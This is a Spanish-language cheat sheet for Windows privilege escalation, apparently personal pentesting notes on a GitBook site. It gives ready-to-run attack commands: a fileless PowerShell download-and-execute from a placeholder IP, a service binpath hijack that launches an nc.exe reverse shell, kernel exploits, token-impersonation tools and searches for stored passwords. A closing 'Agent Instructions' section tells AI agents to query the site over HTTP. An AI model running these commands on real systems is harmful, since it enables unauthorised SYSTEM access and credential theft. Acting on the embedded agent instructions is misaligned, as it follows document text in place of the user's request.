# PrivEsc Windows

De usuario raso a `NT AUTHORITY\SYSTEM`.

## 1. Enumeración Automática (WinPEAS)

La herramienta #1. Si no la usas, estás perdiendo el tiempo.

* **Ejecución**:

  ```powershell
  # Desde memoria (Fileless)
  iex(new-object net.webclient).downloadstring('http://<IP>/winPEASx64.exe')

  # Desde disco
  .\winPEASx64.exe > output.txt
  ```
* **Qué buscar**:
  * Texto en **Rojo/Negrita**: 99% vulnerable.
  * *Unquoted Service Paths*.
  * *AlwaysInstallElevated*.

## 2. Kernel Exploits (La vieja confiable)

Si la máquina es vieja (Server 2008/2012), busca vulnerabilidades del núcleo.

1. `systeminfo`: Copia la salida.
2. `windows-exploit-suggester.py`: Analiza localmente.
3. **Exploits Comunes**:
   * MS17-010 (EternalBlue)
   * MS16-032 (Secondary Logon)
   * PrintNightmare

## 3. Service Abuse (Misconfigurations)

Si un servicio corre como SYSTEM y puedes modificar su binario o configuración.

* **Accesschk**: `accesschk.exe -uwcqv "Authenticated Users" *`
* **Binary Replacement**:

  ```cmd
  sc config <Service> binpath= "C:\path\to\nc.exe -e cmd <IP> 443"
  sc stop <Service>
  sc start <Service>
  ```

## 4. Token Impersonation (SeImpersonatePrivilege)

Si tienes este privilegio (común en IIS/SQL), eres SYSTEM.

* **Herramientas**:
  * `PrintSpoofer.exe -i -c cmd` (Server 2016/2019/10)
  * `JuicyPotato.exe` (Server 2012/2008)
  * `GodPotato` (Moderno, bypasses)

## 5. Passwords in Registry/Files

A veces los admins dejan credenciales en texto plano.

* `reg query HKLM /f password /t REG_SZ /s`
* `findstr /si password *.txt *.ini *.config`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jotatito05.gitbook.io/la-bitacora-de-jotatito05/09.-post-exploitation/windows-privesc.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.